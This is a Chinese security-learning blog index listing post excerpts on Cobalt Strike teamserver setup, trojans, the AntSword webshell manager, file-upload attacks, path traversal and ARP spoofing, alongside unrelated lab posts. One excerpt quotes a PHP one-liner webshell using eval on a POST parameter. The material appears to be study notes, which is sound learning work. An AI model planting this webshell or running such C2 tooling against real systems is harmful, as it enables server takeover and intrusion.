2024年1月22日
cs简单使用
摘要: cs工具使用 给teamserver文件赋权 chmod +x teamserver ./teamserver你的ip自己设置的密码例:./teamserver 192.168.10.128 qaz123#开启服务端 给cobaltstrike.sh文件赋权 chmod +x cobaltstrik 阅读全文
posted @ 2024-01-22 19:05 CLLWA 阅读(55) 评论(0) 推荐(0)
木马制作
摘要: 什么是木马 木马病毒是计算机黑客用于远程控制计算机的程序,将控制程序寄生于被控制的计算机系统中,里应外合,对被感染木马病毒的计算机实施操作。一般的木马病毒程序主要是寻找计算机后门,伺机窃取被控计算机中的密码和重要文件等。可以对被控计算机实施监控、资料修改等非法操作。木马病毒具有很强的隐蔽性,可以根据 阅读全文
posted @ 2024-01-22 15:42 CLLWA 阅读(323) 评论(0) 推荐(0)
蚁剑webshell管理工具使用
摘要: https://github.com/AntSwordProject/ 解压文件 antsword-master部份为源码 loader部份为可视化页面 第一次打开需要配置源码路径 配置成功后如下 使用:结合一句话木马上传一句话木马 访问一下木马, 右键添加数据 *为必填项 填写文件上传的路径,填写 阅读全文
posted @ 2024-01-22 15:26 CLLWA 阅读(233) 评论(0) 推荐(0)
2024年1月20日
常规命令
摘要: mkdir#创建文件夹 cd#进入文件夹/目录 cd ..#上级目录 cd/ #根目录 linux 命令常规参数查询 --help man#详细命令描述信息 关闭服务端口占用 https://overthewire.org/wargames/bandit/bandit0.html 远程登录成功样式如 阅读全文
posted @ 2024-01-20 10:37 CLLWA 阅读(15) 评论(0) 推荐(0)
文件上传
摘要: <?php eval($_POST['pass']);?>#一句话木马eval#代码执行函数$_POST#接受post请求,参数为pass HackBar 新手使用教程_hackbar怎么用-CSDN博客 (hackbar)链接:https://pan.baidu.com/s/1eL8UWGql2L 阅读全文
posted @ 2024-01-20 10:11 CLLWA 阅读(26) 评论(0) 推荐(0)
2024年1月11日
path traversal
摘要: 什么是路径遍历?路径遍历也称为目录遍历。这些漏洞使攻击者能够读取运行应用程序的服务器上的任意文件。这可能包括:应用程序代码和数据。后端系统的凭据。敏感的操作系统文件。在某些情况下,攻击者可能能够写入服务器上的任意文件,从而允许他们修改应用程序数据或行为,并最终完全控制服务器。如何防止路径遍历攻击防止 阅读全文
posted @ 2024-01-11 17:04 CLLWA 阅读(80) 评论(0) 推荐(0)
2023年12月24日
网卡缺失解决办法
摘要: 在我做一些实验时发现没有虚拟网卡,尤其在用gns3对cloud配置的时候,发现怎么点都没有网卡,如下图;网上搜索之后知道了大概问题出在哪里:通常是安装过后,由于某些原因卸载了VMware ,但是没有卸载干净,再次安装时就会出现这种情况。1)先用Geek删干净VMwarework Station,包括 阅读全文
posted @ 2023-12-24 17:39 CLLWA 阅读(102) 评论(0) 推荐(0)
2023年12月13日
实验 2 处理机调度算法
摘要: 1. 实验任务1) 回顾课本第三章中介绍过的作业或进程调度算法,包括先来先服务、最短作业优先、时间片轮转、多级队列调度和多级反馈队列调度等,介绍上述调度算法的设计原理并分析各自的特点;2) 采用高级编程设计语言实现任意一种处理机调度算法;3) 下面提供了实现先来先服务调度算法的参考代码;结合网络资源 阅读全文
posted @ 2023-12-13 10:53 CLLWA 阅读(175) 评论(0) 推荐(0)
2023年12月12日
PKI实验
摘要: 实验概述 实验目的 公钥加密是当今安全通信的基础,但是当通信的一方向另一方发送公钥时,却容易遭受到中间人攻击。根本问题在于没有一个简单的方式验证公钥所有者的身份。也就是说当收到一个公钥和它的所有者信息时,无法确定该公钥确实为这个所有者所拥有。公钥基础设施(PKI)就是解决此问题的一个方案。 本次实验 阅读全文
posted @ 2023-12-12 14:33 CLLWA 阅读(551) 评论(0) 推荐(1)
2023年12月5日
用packEth去进行arp欺骗
摘要: 软件下载地址 链接:https://pan.baidu.com/s/1EDt3ttUnxxQjj7X5czUAXQ?pwd=ri15 提取码:ri15 实验中可能出现缺少pthreadVC.dll的情况,可以在自己的物理机上面c:\windows\SysWOW64下面找到它并复制一个到实验的虚拟机的 阅读全文
posted @ 2023-12-05 16:29 CLLWA 阅读(225) 评论(0) 推荐(0)